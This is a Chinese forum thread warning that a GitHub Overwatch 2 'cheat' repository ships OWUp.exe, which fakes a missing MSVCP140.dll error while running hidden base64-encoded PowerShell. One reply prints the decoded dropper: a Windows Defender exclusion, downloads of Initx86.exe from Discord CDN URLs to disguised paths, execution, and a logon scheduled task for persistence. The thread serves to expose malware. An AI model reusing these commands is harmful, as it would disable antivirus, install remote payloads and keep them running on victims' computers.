不要使用Overwatch-2-Cheat-Aimbot-Esp-main

xtherk

无论是谁打开OWUp.exe都会提示 缺失MSVCP140.dll这是程序里设定好的，并且这个程序干了一些见不得人的事。

图片里反编译了OWUp.exe的源码，OWUp.exe 用c#写的很简单的几行命令，有懂得用dnspy自己反编译看看

帖子链接：把论坛免费自助的交流的地方搞得乌烟瘴气) 中的附件不要使用

你们点开辅助 应该会提示 The program can't start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem 这个吧，我反正没打开， powershell 执行了一些命令，肯定对你电脑没好处   命令被base64编码了，藏着掖着的肯定是见不得人的


附件是从github  Diavonir/Overwatch-2-Cheat-Aimbot-Esp 中获取的，目前github上有很多从事这种操作的，具体内幕不清楚，基本上都是随便复制一点代码并且放一个二进制文件，这个二进制文件根本就不是辅助就是病毒。希望牛友们擦亮眼睛。

不想扣字了，就说这么多，总之就是别用 别打卡

2441993129

楼主锤的漂亮！！！！！！！！！

522615084

解码了一下不知对不对楼主说的没错这货有东西
第一行：Add-MpPreference -ExclusionPath "C:\ProgramData\"
第二行：$url = "https://cdn.discordapp.com/attachments/1024415271525556336/1031909879205609512/Initx86.exe"; $dest = "C:\ProgramData\Microsoft\Crypto\Keys\SearchProtocolHost.exe"; Invoke-WebRequest-Uri$urlOutFile$dest;"&'C:\ProgramData\Microsoft\Crypto\Keys\SearchProtocolHost.exe'" | Invoke-Expression
第三行：$url = "https://cdn.discordapp.com/attachments/1024415271525556336/1030577692199895101/Initx86.exe"; $dest = "C:\ProgramData\Microsoft\Crypto\Keys\StartMenuExperienceHost.exe"; Invoke-WebRequest-Uri$url-OutFile$dest;"& 'C:\ProgramData\Microsoft\Crypto\Keys\StartMenuExperienceHost.exe'"| Invoke-Expression ; SCHTASKS/create/scONLOGON/TN"Moxi\Moxi"/TR"C:\ProgramData\Microsoft\Crypto\Keys\StartMenuExperienceHost.exe"

沧笙忆梦

又见技术帖！

907954823

感谢楼主，好人一生平安

xtherk

522615084 发表于 2022-10-24 19:02
解码了一下不知对不对楼主说的没错这货有东西
第一行：Add-MpPreference -ExclusionPath "C:\ProgramData\ ...

没毛病

wenslong

感谢楼主，好人一生平安

2565441686

好贴支持！

zd2540771

感谢大佬查毒提醒

wink

国外unknown网站也是有人反应下完git里面附件提示缺少dll，然后还关不掉像是被劫持挖矿了。只能说免费的才是最贵的！